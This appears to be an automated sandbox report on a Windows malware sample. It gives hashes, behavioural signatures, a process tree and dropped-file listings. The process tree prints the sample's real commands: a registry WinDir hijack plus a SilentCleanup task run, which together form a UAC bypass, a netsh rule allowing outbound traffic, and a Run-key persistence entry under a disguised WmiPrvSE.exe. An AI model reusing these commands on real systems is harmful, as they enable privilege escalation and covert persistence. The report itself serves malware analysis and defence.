Overview

overview

7

Static

static

3

09f4f3a9a0...3c.exe

windows7-x64

7

09f4f3a9a0...3c.exe

windows10-2004-x64

7

Analysis

  • max time kernel
    150s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    24/05/2024, 14:30

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    09f4f3a9a0b5a8c7ab42bf1a41ae623c.exe

  • Size

    4.6MB

  • MD5

    09f4f3a9a0b5a8c7ab42bf1a41ae623c

  • SHA1

    9539731deda693a7a1ac1eaa05a9dc9634b8cccf

  • SHA256

    49127fcef058750578d87b6a4a25c8da77185cdd8796bc589dc5cf31f884c171

  • SHA512

    1e210da69c9b1ecbe2430797d5edc5a90a26ead5f83db33374fcb0c527d422f034528f7801dc94a5258f8c9d3b3ab59ae9dfb0a219cd616132284f4ce11433ac

  • SSDEEP

    98304:9nERg/N+WJxMA8ILCFGI1uE4ZVPJEdjMd:gg/N+W9vOGp/PJEVMd

Score
7/10
persistence

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 23 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\09f4f3a9a0b5a8c7ab42bf1a41ae623c.exe
    "C:\Users\Admin\AppData\Local\Temp\09f4f3a9a0b5a8c7ab42bf1a41ae623c.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2884
    • C:\ProgramData\Windows\Application\Set\Win\WmiPrvSE.exe
      "C:\ProgramData\Windows\Application\Set\Win\WmiPrvSE.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of WriteProcessMemory
      PID:2908
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -C Set-ItemProperty -Path "HKCU:\Environment" -Name "WinDir" -Value 'cmd.exe /c netsh advfirewall firewall add rule name="WmiPrvSE.exe" dir=OUT action=allow program="C:\ProgramData\Windows\Application\Set\Win\WmiPrvSE.exe" enable=yes&&exit &'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2564
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
        3⤵
          PID:2608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -C "Remove-ItemProperty -Path "HKCU:\Environment" -Name 'WinDir'"
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:548
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "WinSocket" /d "C:\ProgramData\Windows\Application\Set\Win\WmiPrvSE.exe" /f&exit
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:2452
          • C:\Windows\system32\reg.exe
            reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "WinSocket" /d "C:\ProgramData\Windows\Application\Set\Win\WmiPrvSE.exe" /f
            4⤵
            • Adds Run key to start application
            PID:808

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
            Filesize

            7KB

            MD5

            6a36a166a5812bb12bbd371e31c4e229

            SHA1

            0d03964fc47e49cf0930a5ff3dbf12d1c62c6009

            SHA256

            d10cf3fd8230edadbe8224fc7031d5e343bd352490b037b8c63ca0f143daf43f

            SHA512

            0085eb9294f1972db66baf70f4a59bc3263b72d94bb44fafd7d6a770313e600f8b10f47afb98967f224e3730381d318854ee2b7fc8a8c83c6cb04b5dc3ac1127

            Download Submit

          • \ProgramData\Windows\Application\Set\Win\WmiPrvSE.exe
            Filesize

            4.6MB

            MD5

            09f4f3a9a0b5a8c7ab42bf1a41ae623c

            SHA1

            9539731deda693a7a1ac1eaa05a9dc9634b8cccf

            SHA256

            49127fcef058750578d87b6a4a25c8da77185cdd8796bc589dc5cf31f884c171

            SHA512

            1e210da69c9b1ecbe2430797d5edc5a90a26ead5f83db33374fcb0c527d422f034528f7801dc94a5258f8c9d3b3ab59ae9dfb0a219cd616132284f4ce11433ac

            Download Submit

          • memory/548-25-0x00000000020C0000-0x00000000020C8000-memory.dmp

            Filesize

            32KB

            Download

          • memory/548-24-0x000000001B190000-0x000000001B472000-memory.dmp

            Filesize

            2.9MB

            Download

          • memory/2564-13-0x000000001B260000-0x000000001B542000-memory.dmp

            Filesize

            2.9MB

            Download

          • memory/2564-14-0x0000000001FA0000-0x0000000001FA8000-memory.dmp

            Filesize

            32KB

            Download

          • memory/2884-0-0x00000000001C0000-0x00000000001C1000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2884-7-0x0000000000400000-0x00000000008A3000-memory.dmp

            Filesize

            4.6MB

            Download

          • memory/2908-15-0x0000000000400000-0x00000000008A3000-memory.dmp

            Filesize

            4.6MB

            Download

          • memory/2908-16-0x0000000000400000-0x00000000008A3000-memory.dmp

            Filesize

            4.6MB

            Download

          • memory/2908-17-0x0000000000400000-0x00000000008A3000-memory.dmp

            Filesize

            4.6MB

            Download

          • memory/2908-8-0x0000000000230000-0x0000000000231000-memory.dmp

            Filesize

            4KB

            Download

          • memory/2908-26-0x0000000000400000-0x00000000008A3000-memory.dmp

            Filesize

            4.6MB

            Download

          • memory/2908-27-0x0000000000400000-0x00000000008A3000-memory.dmp

            Filesize

            4.6MB

            Download

          • memory/2908-32-0x0000000000400000-0x00000000008A3000-memory.dmp

            Filesize

            4.6MB

            Download